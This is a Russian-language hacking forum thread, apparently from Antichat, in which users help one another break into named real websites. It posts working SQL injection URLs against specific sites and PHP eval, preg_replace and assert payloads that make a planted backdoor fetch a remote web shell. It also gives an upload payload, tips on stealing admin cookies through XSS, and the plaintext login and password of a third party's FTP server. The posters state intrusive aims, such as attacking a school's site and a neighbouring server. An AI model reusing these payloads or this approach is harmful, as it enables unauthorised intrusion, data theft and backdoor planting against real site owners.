Посоветуйте скрипт для поиска бекдоров шелов и т.д на сервере,кроме айболита.

Затерялся, похоже, мой вопрос в этой гуще.


rogatiy said:
Господа, новая задача:

Code:
PHP 5.2.6-1+LENNY16
allow_url_fopen On
allow_url_include Off
file_uploads On
magic_quotes_gpc On
magic_quotes_runtime Off
magic_quotes_sybase Off
cURL On

Дыра всё та же - PHP inj в URL. /search?name={${eval(stripslashes($_GET[cmd]))}}&cmd=phpinfo(); не пашет, name={${eval(stripslahes(file_get_contents($_COOKI E[shell])))}}, где содержание печеньки "shell" = 'линк на шелл', тоже, точнее срабатывают MQ, кавычки экранируются и запрос ломается. Идеи?

rogatiy said:
Затерялся, похоже, мой вопрос в этой гуще.


кавычки в eval можно обойти такой конструкцией:

copy($_POST[a],$_POST)&a=http://site/shell.txt&b=shell.php

Warning: copy() [function.copy]: Unable to access in /hosting/htdocs/as/kernel/insert.inc.php(570) : eval()'d code on line 1

Недостаточно прав? Давайте тогда уж рассматривать ситуацию с file_get_contents, там хоть более менее знакомо всё, хоть конфиги почитать получится. name={${eval(stripslashes(file_get_contents($_POST[ev])))}}&ev=http://site/shell.txt не проходит, код шелла без , то есть всё, вроде, кошерно

qaz said:
они в БД лежат а не в папке


Эт понятно, но любая база данных представляет собой набор файлов, расположенных в определенной директории. Из вашего утверждения следует, что на основании предоставленных мной данных невозможно узнать расположение файлов базы данных и их имена? Какую еще информацию нужно для этого получить?

Спасибо

rogatiy

А не проще, выложить УРЛ или отписать кому-то в ПМ, что бы помогли, а не играть тут в игру "сделайте, то не зная, что где и как" на 5 страниц темы! т.к. того, что Вы предоставили может не хватать и что бы узнать, что конкретно не дает Вам добиться полноценного шелла на сайте, зачем людей заставлять играть в угадайку: "а может так, получиться, а так не пробовали..."

Здравствуйте. В поисках уязвимостей на сайте учебного заведения наткнулся на вот такой баг. _http://www.sibcol.ru/system/download/ Как я понял с помощью этого даонлодэра можно залить шелл. Вопрос в том куда в итоге попадают загруженные файлы? В корне и в этой самой дирректории залитые файлы не находятся.

NECHISTb said:
Здравствуйте. В поисках уязвимостей на сайте учебного заведения наткнулся на вот такой баг. _http://www.sibcol.ru/system/download/ Как я понял с помощью этого даонлодэра можно залить шелл. Вопрос в том куда в итоге попадают загруженные файлы? В корне и в этой самой дирректории залитые файлы не находятся.


Игра есть такая. "Прятки" называется. Вот когда ты находишь подобную форму для аплоада - ты невольно подписываешься на её участие. И каждый раз итоговая папка может быть спрятана хз где...

З.Ы. У тебя кроме раскрытия путей, вроде бы, ничего полезного сделать нельзя.

BigBear said:
Игра есть такая. "Прятки" называется. Вот когда ты находишь подобную форму для аплоада - ты невольно подписываешься на её участие. И каждый раз итоговая папка может быть спрятана хз где...
З.Ы. У тебя кроме раскрытия путей, вроде бы, ничего полезного сделать нельзя.


Дело в том что и на закрытые страницы которые указаны в robots.txt по адресу _http://www.sibcol.ru/system/sophos/IDES/

я не могу попасть... Есть ли способ отследить загрузку файла?

NECHISTb said:
Дело в том что и на закрытые страницы которые указаны в robots.txt по адресу _http://www.sibcol.ru/system/sophos/IDES/
я не могу попасть... Есть ли способ отследить загрузку файла?


какую загрузку?? таф функция file_get_contents ты моксимум чо сможешь сделать это профитать исходники файлов на сервере

del/

Massay said:
Что можно сделать с
http://job.ukr.net/vacancy/kw-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D0%B8%D 1%81%D1%82_%D0%BF%D0%BE_%D0%BF%D1%80%D0%B8%D0%B2%D 0%BB%D0%B5%D1%87%D0%B5%D0%BD%D0%B8%D1%8E_%D0%BA%D0 %BB%D0%B8%D0%B5%D0%BD%D1%82%D0%BE%D0%B2_(%D0%BA%D1 %80%D0%B0%D1%81%D0%B8%D0%BB%D0%BE%D0%B2,__%D0%BD%D 0%B5%D1%82%D0%B8%D1%88%D0%B8%D0%BD,__%D1%88%D0%B5% D0%BF%D0%B5%D1%82%D0%BE%D0%B2%D0%BA%D0%B0),__%D1%8 1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D0%B8%D1%81% D1%82_%D0%BF%D0%BE_%D0%BF%D1%80%D0%B8%D0%B2%D0%BB% D0%B5%D1%87%D0%B5%D0%BD%D0%B8%D1%8E_%D0%BA%D0%BB%D 0%B8%D0%B5%D0%BD%D1%82%D0%BE%D0%B2__(%D1%81%D1%82% D0%B0%D1%80%D0%BE%D0%BA%D0%BE%D0%BD%D1%81%D1%82%D0 %B0%D0%BD%D1%82%D0%B8%D0%BD%D0%BE%D0%B2,__%D0%BD%D 0%BE%D0%B2%D0%B0-%D1%83%D1%88%D0%B8%D1%86%D0%B0),__%D1%81%D0%BF%D0% B5%D1%86%D0%B8%D0%B0%D0%BB%D0%B8%D1%81%D1%82_%D0%B F%D0%BE_%D0%BF%D1%80%D0%B8%D0%B2%D0%BB%D0%B5%D1%87 %D0%B5%D0%BD%D0%B8%D1%8E_%D0%BA%D0%BB%D0%B8%D0%B5% D0%BD%D1%82%D0%BE%D0%B2__(%D1%87%D0%B5%D0%BC%D0%B8 %D1%80%D0%BE/


Ну для начало не помешало бы ознакомиться с тематикой раздела и понять какого рода сдесь посты выкладываются...

Xeson said:
Вытащил пароль администратора через скулю, у него пароль отображается так: "\xE4\xEC\xE8\xF2\xF0\xE8\xE9" как получить нормальный вид пароля?

(у всех отображается нормально)


дмитрий

Как еще можно обойти фильтрацию union+select? переносы строк, /*!, urlencode не помогает

Help

Парни, прошу помощи


http://www.mycarhelpline.com/index.php?option=com_easyblog&view=blogger&layout=statistic&id=128&stat=tag'&tagid=60&Itemid=91


крутил его по разному, и не пойму есть уязвимость или ее никак не разколоть?

вопрос

где именно в php nuke находится адрес сайта?

пролез в бд соседнего сервера, а адрес найти не могу

как в sqlmap использовать конструкцию "where"? допустим я хочу сдампить те строки где type=admin

в гугле нашел только, дамп определенной колонки:

python sqlmap.py -u http://site.com --dump -T member -C type

Сделайте интерактивный SQL Shell и работайте через него и уже там указывайте выборку и условия.

python sqlmap.py --url="http://site.com" --sql-shell

Не понимаю, как раскрутить скулю.


Code:
http://www.rstomat.ru/qwe.php?id=14'+UNION+SELECT+1,2,3,4,+--+

Менял пробелы, менял цифры, а ошибка одна и та же. Так же и с GROUP BY и ORDER BY.

Хавжи раскручивает скулю на раз, а мне интересно научится руками.

Что я делаю не правильно?

Спасибо за разъяснения.

HackCrack said:
Не понимаю, как раскрутить скулю.

Code:
http://www.rstomat.ru/qwe.php?id=14'+UNION+SELECT+1,2,3,4,+--+

Менял пробелы, менял цифры, а ошибка одна и та же. Так же и с GROUP BY и ORDER BY.
Хавжи раскручивает скулю на раз, а мне интересно научится руками.
Что я делаю не правильно?
Спасибо за разъяснения.


Вопервых кавычка в вашем случае экранируется, во вторых там 5 полей вот рабочий пример:


_ttp://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,4,5+--+

Спасибо.

Теперь проблема в том, чтобы получить названия таблиц.


Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+informatio n_schema.tables+limit+4,1+--+

Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..

Как получить нужные таблицы?

PS. пробелы в слове information не удаляются в сообщении. В юрл-строке их нету.

Кто-нибудь может проконсультировать по XSS?

Суть такая, короче зарегистровался на сайте под ником '>alert()

и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?

AIRZI said:
Кто-нибудь может проконсультировать по XSS?
Суть такая, короче зарегистровался на сайте под ником '>alert()
и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?


Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.

HackCrack said:
Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.


Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы?

Ведь по логике админ должен пройти по какой-то ядовитой ссылке7

HackCrack said:
Спасибо.
Теперь проблема в том, чтобы получить названия таблиц.

Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+informatio n_schema.tables+limit+4,1+--+

Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..
Как получить нужные таблицы?


листать дальшше


AIRZI said:
Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы?
Ведь по логике админ должен пройти по какой-то ядовитой ссылке7


/thread20140.html

HackCrack said:
Спасибо.
Теперь проблема в том, чтобы получить названия таблиц.

Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+informatio n_schema.tables+limit+4,1+--+

Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..
Как получить нужные таблицы?
PS. пробелы в слове information не удаляются в сообщении. В юрл-строке их нету.




Code:
http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+informatio n_schema.tables+where+table_schema=database()+limi t+4,1+--+

На сайте есть минишелл eval(stripslashes($_GET[e]));

allow_url_fopen On

allow_url_include Off

disable_functions exec,passthru,shell_exec,proc_open,popen

Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит

Evil_Genius said:
На сайте есть минишелл eval(stripslashes($_GET[e]));
allow_url_fopen On
allow_url_include Off
disable_functions exec,passthru,shell_exec,proc_open,popen
Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит


Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться.


Code:
$content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h);

UPD

А еще проще залей текст шелла без на хост

,а потом

?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.

blesse said:
Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться.

Code:
$content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h);

UPD
А еще проще залей текст шелла без на хост
,а потом
?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.



Такое не прокатывает какраз(((

Вот таким методом выводится через минишелл.

file.php?e=phpinfo();

Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить.

Ранее нормально закачивал таким методом, но щас папка закрыта для правки:

file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=/form%3E

Evil_Genius said:
Такое не прокатывает какраз(((
Вот таким методом выводится через минишелл.
file.php?e=phpinfo();
Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить.
Ранее нормально закачивал таким методом, но щас папка закрыта для правки:
file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=/form%3E


Ну Дак ты пиши чё не прокатывает????

Добрый день. Прошу прощения за глупый вопрос, но что-то никак не могу решить для себя такую проблему:

Хочу получить как можно более широкий доступ к нужному мне сайту, но в этом деле я-новичек. Поэтому сделал следующее:

1. Просканировал сайт акунетиксом (он нашел там читалку файлов, XSS, и поля для брута)

2. Просканировал сайт с помощью Wikto backend, используя структуру, построенную акунетиксом, нашел несколько "спрятанных" файлов, в том числе rsa-ключи для подключения к виртуальной сети

3. Просканировал сайт и виртуальную сеть Нмапом, нашел открытые порты и проассоциировал их с приложениями.

4. В расшаренных папках виртуальной сети ничего интересного не нашел.

5. Читалкой файлов прочитал и сохранил у себя все конфиги и ПХП-шки, какие смог найти.

А теперь уперся в стену: сайт использует пофиксенный TBdev, с моими ущербными знаниями ПХП и мускуля трудно надеяться на нахождение инъекции и ее эксплуатацию, кроме того, насколько я понял, инъекция - это почти крайний случай (когда нет доступа к файлам, порты закрыты и т.д.). В моем-же случае есть открытые порты, могу читать файлы, и имею доступ к внутренней сети, но не знаю, как этим воспользоваться.

Для себя выстроил следующий алгоритм:

1. Атака на открытые порты сайта и устройств сети (инфы и приложений не могу найти, Nmap почему-то не хочет запускать скрипты)

2. Поиск места хранения файлов базы данных и открытие их через читалку файлов (меня уверяют, что таких файлов не существует)

3. Анализ ПХП кода и составление действующих инъекций (не хватает знаний для анализа структуры кода, а программ, автоматизирующих этот процесс, по-видимому, тоже нет)

4. Брут по доступным формам авторизации (кажись, как-то натыкался на проги, поищу, но админ всегда залогинен, как это обойти, не знаю)

5. XSS (но про них даже еще не читал и пока слабо представляю принцип работы)

6. Помещение троянов во внутреннюю сеть (но это для меня вообще фантастика)

Прошу помощи с литературой, методой и софтом, особенно по первым пунктам.

Спасибо

собств. вопрос можно ли зная хеш и соль (sql инъекция) залогиниться в админку Vbulletin 4.0.2. хотелось бы узнать технику реализации.

pinch said:
собств. вопрос можно ли зная хеш и соль (sql инъекция) залогиниться в админку Vbulletin 4.0.2. хотелось бы узнать технику реализации.


Нет, нельзя. Для этого хэшики и солят, чтобы усложнить подбор пароля.

Эх, было бы всё так легко ...

так было гдето статья с помощью хэша и соли логинятся, но только админка при этом не доступна. а так в Вордпрессе можно логинится с помощью хэша без расшифровки актуально до самой последней версии, в джумле соотв. тоже (генерируют куки вот в этом и секрет)

pinch said:
так было гдето статья с помощью хэша и соли логинятся, но только админка при этом не доступна. а так в Вордпрессе можно логинится с помощью хэша без расшифровки актуально до самой последней версии, в джумле соотв. тоже (генерируют куки вот в этом и секрет)


Файл сессии руками на сервере создавать будешь ? Session_ID от балды придумывать ?

pinch said:
так было гдето статья с помощью хэша и соли логинятся, но только админка при этом не доступна. а так в Вордпрессе можно логинится с помощью хэша без расшифровки актуально до самой последней версии, в джумле соотв. тоже (генерируют куки вот в этом и секрет)


Научи, как в Joomla залогониться при помощи хэша

pinch said:
так было гдето статья с помощью хэша и соли логинятся, но только админка при этом не доступна. а так в Вордпрессе можно логинится с помощью хэша без расшифровки актуально до самой последней версии, в джумле соотв. тоже (генерируют куки вот в этом и секрет)


если и есть такой способ, то это единичный случай с конкретной багой по конкретной версии, а так это фейк!

Zahar said:
если и есть такой способ, то это единичный случай с конкретной багой по конкретной версии, а так это фейк!


Мембер pinch просто, судя по всему, говоря про WP и Joomla, путает понятия обхода авторизации со сбросом пароля, и последующей авторизацией со своим, уже вновь заданным паролем. Если это так, то где-то тут на Ачате подобная статейка касательно WP точно проскакивала.

А, вот, нашел, что я имел ввиду /thread359532.html

В данной статье раскрывается метод сброса пароля для движка WP, при наличии доступа к БД сайта. И про Joomla там тоже упоминания есть, только в ее случае не все так просто.

Надо будет, кстати, поставить плюсик автору статьи за труды. Интересная находка :3

Га-Ноцри said:
Мембер pinch просто, судя по всему, говоря про WP и Joomla, путает понятия обхода авторизации со сбросом пароля, и последующей авторизацией со своим, уже вновь заданным паролем. Если это так, то где-то тут на Ачате подобная статейка касательно WP точно проскакивала.
А, вот, нашел, что я имел ввиду /thread359532.html
В данной статье раскрывается метод сброса пароля для движка WP, при наличии доступа к БД сайта. И про Joomla там тоже упоминания есть, только в ее случае не все так просто.
Надо будет, кстати, поставить плюсик автору статьи за труды. Интересная находка :3


сорь за оффтоп, ток вот не зря там люди жаловались на то что он спалил зту тему, так как и не прошло и 2 недели после его поста как было сделано обновление ворд пресса в котором лавочка прикрылась.

http://rostovshoes.ru/shoes/?6,1,,,all'

Что скажете?

Нужен совет, целесообразно ли копать далее в этой области?

Нужно получить фотки с одного ftp

host: files.wwe.com случайно наткнуля на страницу там для СМИ давали логин и пароль но доступ они давали строго в одну категорию где особо ничего нужного нет. А теперь вопрос возможно ли как то получить доступ к другим каталогам или хотя бы получить их структуру?

Информация что имеется

ftp://ftp517:triple772ftp@files.wwe.com

Name: ftp517

Password: triple772ftp

Host: files.wwe.com

когда на сайте захожу в какую либо фотку ссыль такая

http://www.wwe.com/f/styles/photo_large/public/photo/image/2013/04/RAW_1036_Photo_007.jpg

если убрать /styles/photo_large/public то фотка появляется в чуть большем размере то есть прямой путь к (f) то есть files.wwe.com что и есть host. Просто знаю одного иностранца который имеет доступ к этому серваку но ничего не говорит. И он качает оттуда tiff, dng и так далее куда лучшего качества чем на сайте.

Вопрос прозвучал ранее есть ли шанс получить доступ к заветным файлам? через данную инфу?

Нарыл на сайте спрятанный пхпинфо, а в нем пасс и логин админа, только админ залогинен круглосуточно, а сайт не позволяет залогиниться с разных ип одному юзеру. Как это можно обойти?

в phpinfo логин и пасс ? 0_о

shell_c0de said:
в phpinfo логин и пасс ? 0_о


Как в том анекдоте про говорящую корову: "Че смотришь? Я сама охуела".

НО, как я уже сказал, залогиниться под ним не могу. Там-же, кстати еще и куки прописаны, но подставлять пока не пробовал, к тому-же не понятно, админские они или нет, и не залочит-ли их сервер с другого ип, как лочит авторизацию...

Помогите советом

Подскажите, это:

passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt)))

означает

md5(md5(salt.pass.salt))

или

md5(md5(salt.md5(pass).salt))

Или нет?

zloy_fantom said:
Подскажите, это:
passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt)))
означает
md5(md5(salt.pass.salt))
или
md5(md5(salt.md5(pass).salt))
Или нет?


md5(salt.password.salt)

zloy_fantom said:
Нарыл на сайте спрятанный пхпинфо, а в нем пасс и логин админа, только админ залогинен круглосуточно, а сайт не позволяет залогиниться с разных ип одному юзеру. Как это можно обойти?


Чё за бред ? Быть такого не может...

короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions


PHP:
eval,exec,system,passthru,scandir,popen,shell_exec ,proc_open,proc_close,proc_nice,get_current_user,g etmyuid,posix_getpwuid,apache_get_modules,virtual, posix_getgrgid,getmyinode,fileowner,filegroup,getm ypid,apache_get_version,apache_getenv,apache_note, apache_setenv,disk_free_space,diskfreespace,dl,ini _restore,openlog,syslog,highlight_file,show_source ,symlink,disk_total_space,ini_get_all,get_current_ user,posix_uname

тоесть eval отключён( как теперь можно попасть в шел)

BigBear said:
Чё за бред ? Быть такого не может...


Поверьте, там есть данные:

http://s018.radikal.ru/i523/1304/c1/1d2df5b035b4t.jpg (http://radikal.ru/F/s018.radikal.ru/i523/1304/c1/1d2df5b035b4.png.html)

sova1611 said:
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions

PHP:
eval,exec,system,passthru,scandir,popen,shell_exec ,proc_open,proc_close,proc_nice,get_current_user,g etmyuid,posix_getpwuid,apache_get_modules,virtual, posix_getgrgid,getmyinode,fileowner,filegroup,getm ypid,apache_get_version,apache_getenv,apache_note, apache_setenv,disk_free_space,diskfreespace,dl,ini _restore,openlog,syslog,highlight_file,show_source ,symlink,disk_total_space,ini_get_all,get_current_ user,posix_uname

тоесть eval отключён( как теперь можно попасть в шел)


Попробуй так:

?e=preg_replace("/.*/e","phpinfo();",".");

P.S: Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!

winstrool said:
Попробуй так:
?e=preg_replace("/.*/e","phpinfo();",".");
P.S:
Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!


выдало Hacking attempt! а на другом бэкдоре выдало phpinfo

а вот ?e=preg_replace("/.*/e","file_get_contents('http://site.ru/2.txt');",".");

не обработало ни на одном(

zloy_fantom said:
Поверьте, там есть данные:
http://s018.radikal.ru/i523/1304/c1/1d2df5b035b4t.jpg (http://radikal.ru/F/s018.radikal.ru/i523/1304/c1/1d2df5b035b4.png.html)


это твои куки)))

winstrool said:

sova1611 said:
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
PHP код:
eval, exec, system, passthru, scandir, popen, shell_exec, proc_open, proc_close, proc_nice, get_current_user, getmyuid, posix_getpwuid, apache_get_modules, virtual, posix_getgrgid, getmyinode, fileowner, filegroup, getmypid, apache_get_version, apache_getenv, apache_note, apache_setenv, disk_free_space, diskfreespace, dl, ini_restore, openlog, syslog, highlight_file, show_source, symlink, disk_total_space, ini_get_all, get_current_user, posix_uname
тоесть eval отключён( как теперь можно попасть в шел)


Попробуй так:
?e=preg_replace("/.*/e","phpinfo();",".");
P.S:
Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!


" if author else f"

winstrool said:

sova1611 said:
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50 cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions
PHP код:
eval, exec, system, passthru, scandir, popen, shell_exec, proc_open, proc_close, proc_nice, get_current_user, getmyuid, posix_getpwuid, apache_get_modules, virtual, posix_getgrgid, getmyinode, fileowner, filegroup, getmypid, apache_get_version, apache_getenv, apache_note, apache_setenv, disk_free_space, diskfreespace, dl, ini_restore, openlog, syslog, highlight_file, show_source, symlink, disk_total_space, ini_get_all, get_current_user, posix_uname
тоесть eval отключён( как теперь можно попасть в шел)


Попробуй так:
?e=preg_replace("/.*/e","phpinfo();",".");
P.S:
Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!


Я тебе открою страшную хакерскую тайну, только никому не говори!

Админ там мудак. Таким образом eval не отключается, тоесть ей пофиг эта директива, а почему так, можно будет узнать если кушать манную кашу и читать хоть что то по теме, а не давать советы (постоянно не в тему, прошу заметить ))).

zloy_fantom said:
Поверьте, там есть данные:
http://s018.radikal.ru/i523/1304/c1/1d2df5b035b4t.jpg (http://radikal.ru/F/s018.radikal.ru/i523/1304/c1/1d2df5b035b4.png.html)


ага и такое бывает http://forums.devshed.com/php-development-5/phpinfo-shows-my-password-246249.html

ты же залогинен на сайте именно под этим логин пассом так ? или там вместо пасса хеш сумма.

P.S или это кривость рук админа с настройками вебпанелей, в любом случае такого не должно быть и это не правильно.

shell_c0de said:
ага и такое бывает http://forums.devshed.com/php-development-5/phpinfo-shows-my-password-246249.html
ты же залогинен на сайте именно под этим логин пассом так ? или там вместо пасса хеш сумма.
P.S или это кривость рук админа с настройками вебпанелей, в любом случае такого не должно быть и это не правильно.


В общем все было несколько иначе, просто я, когда писал, решил упростить.

Я прочитал скрипт memcache.php, в котором были логин и пасс в явном виде, потом запустил его, скрипт затребовал авторизацию, я ввел данные и просмотрел предложенные данные, ничего интересного не нашел, открыл индекс, он показал мне, что я не сервере НЕ ЗАЛОГИНЕН, т.е. авторизация к memcache.php происходит в обход базы данных (тупо сравниваются введенные данные со строкой в скрипте). После этого я открыл пхп инфо, согласен, скорее всего куки, логин и пасс перешли туда из моей сессии. Попозже проведу более чистый эксперимент. Куда копать понял.

Но что мне делать с этим админом, который постоянно залогинен, ведь я даже не знаю, совпадает-ли этот пароль с паролем от сайта....

KolosJey said:
Я тебе открою страшную хакерскую тайну, только никому не говори!
Админ там мудак. Таким образом eval не отключается, тоесть ей пофиг эта директива, а почему так, можно будет узнать если кушать манную кашу и читать хоть что то по теме, а не давать советы (постоянно не в тему, прошу заметить ))).


как я понял решения под мою проблему нет?фильтрует dle кавычки(

sova1611 said:
как я понял решения под мою проблему нет?


Что за люди ленивые пошли я в ах**у,ты пока флудил тут уже решение нашел бы.У тебя ограничения мизерные вариантов море как залиться.

Исполнял аплоадеры который запросто залазят а get-запрос,тебе выше сказали юзай preg_replace если не получается ей исполнить код читай ман по ней,юзай вместо eval функцию assert

blesse said:
Что за люди ленивые пошли я в ах**у,ты пока флудил тут уже решение нашел бы.У тебя ограничения мизерные вариантов море как залиться.
Исполнял аплоадеры который запросто залазят а get-запрос,тебе выше сказали юзай preg_replace если не получается ей исполнить код читай ман по ней,юзай вместо eval функцию assert


через preg_replace шел не заливается так как фильтруются кавычки,пробывал preg_replace("/.*/e","copy('http://site.ru/1.txt','shell.php');","."); ,проверял на другом всё норм,assert тоже не сработало(может не правильно составил запрос(

print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

тоже не помогло(

sova1611 said:
через preg_replace шел не заливается так как фильтруются кавычки,пробывал preg_replace("/.*/e","copy('http://site.ru/1.txt','shell.php');","."); ,проверял на другом всё норм,assert тоже не сработало(может не правильно составил запрос(




Code:
фильтруются кавычки,пробывал

А preg_replace(base64_decode('')); религия не позволяет?

Че там у тебя может не получиться?

assert(file_get_contents('http://site/shell.txt'));

$terms = $input->request->get('highlight', null, 'base64');

$terms = $terms ? unserialize(base64_decode($terms)) : null;

как можно использовать в "своих" целях?

файл highlight.php

blesse said:

Code:
фильтруются кавычки,пробывал

А preg_replace(base64_decode('')); религия не позволяет?
Че там у тебя может не получиться?
assert(file_get_contents('http://site/shell.txt'));


preg_replace(base64_decode(KCIvLiovZSIsInBocGluZm8 oKTsiLCIuIik7)); не срабатывает(

Какой ахтунг. А кто будет указывать в функции модификатор?

Like this - preg_replace("//e", "payload", NULL);

Есть слепая скуля и запрос вида 1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x25757365727325)and( data_length>0)))))='

ответ выдает ошибку syntax to use near ';0)))))='1'

скуля не выполняется полностью из-за знака ">" в запросе, т.к. меняется на > и обваливается

Вопрос: как правильно оформить или вернее можно ли поменять знак ">" ?

Sanic1977 said:
Есть слепая скуля и запрос вида 1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x25757365727325)and( data_length>0)))))='
ответ выдает ошибку syntax to use near ';0)))))='1'
скуля не выполняется полностью из-за знака ">" в запросе, т.к. меняется на > и обваливается
Вопрос: как правильно оформить или вернее можно ли поменять знак ">" ?


попробуй вместо > подставить !=

BlackIce said:
попробуй вместо > подставить !=


да об этом знаю. работает только ответ Subquery returns more than 1 row

а как сделать на интервале 0..10 или

like(0x25757365727325)and( data_length>0)and( data_length

[QUOTE="Sanic1977"]
Sanic1977 said:
да об этом знаю. работает только ответ Subquery returns more than 1 row
а как сделать на интервале 0..10 или
like(0x25757365727325)and( data_length>0)and( data_length0)and( data_length

BigBear said:
data_length not in (0)
data_length between (0) and (10)


такая конструкция не работает

выдает syntax to use near 'between((0)and(10))))))='1

Sanic1977 said:
такая конструкция не работает
выдает syntax to use near 'between
(
(0)and(10)
)
))))='1


between(0)and(10)))))='1

как можно раскрутить highlight.php ??

например http://www.itwire .com/plugins/system/highlight/highlight.php

Уязвимость > http://1337day.com/exploit/description/20447

Хотя-бы намёк дайте,пожалуйста.

http://animemagazine.info/index.php?productID=1+order+by+4+--+

http://animemagazine.info/index.php?productID=-1+union+select+1,2,3,4+--+

Тело письма говорит



Как вывести принтабельные поля?

Улыбайся said:
http://animemagazine.info/index.php?productID=1+order+by+4+--+
http://animemagazine.info/index.php?productID=-1+union+select+1,2,3,4+--+
Тело письма говорит

Как вывести принтабельные поля?




PHP:
http://animemagazine.info/index.php?productID=1%27+or+1+group+by+concat%28%2 8select+version%28%29%29,0x00,floor%28rand%280%29* 2%29%29having+min%280%29+or+1--+

Помогите новичку, пожалуйста. Что обычно делают с Xss уязвимостями, после того как обнаружил их?

Xazarychi said:
Помогите новичку, пожалуйста. Что обычно делают с Xss уязвимостями, после того как обнаружил их?


по идее дописуют жс код, подкидуют ссылку на уязвимость админу чтобы своровать куки(не спрашивай как, а просто ЗАЙДИ В ГУГЛ И ПОСМОТРИ, ТАМ СТАТЕЙ НА ЭТУ ТЕМУ МИЛИОНЫ), но в 99 процентов случаях просто забивают и ничего не делают, потому что, то админки нету, то связатся с админом невозможно, и вобще это такой гемор который в 90% случаев того не стоит.

Можно ли и как возломать НЕпосещаемую страницу на сайте знакомств Loveplanet?

Всем привет!

Подскажите можно из этого что нить извлечь


PHP:
http://mlw-cardon.ru/check?domain=1'

Havij v1.16 - не может подцепиться

А сам новичке не могу все время тот же результат

как минимум это раскрытие путей /home/users2/w/waf/domains/mlw-cardon.ru/

удаленный инклуд не просматривается, хотя и очевиден =(

но есть скуля-буля там )) пиши мне в ПМ если хочешь узнать больше

\/IRUS said:
как минимум это раскрытие путей /home/users2/w/waf/domains/mlw-cardon.ru/
удаленный инклуд не просматривается, хотя и очевиден =(
но есть скуля-буля там )) пиши мне в ПМ если хочешь узнать больше



Спасибо это было очевидно!

Но от помощи раскрыть sql не откажусь

фильтр таблицы

привет всем !

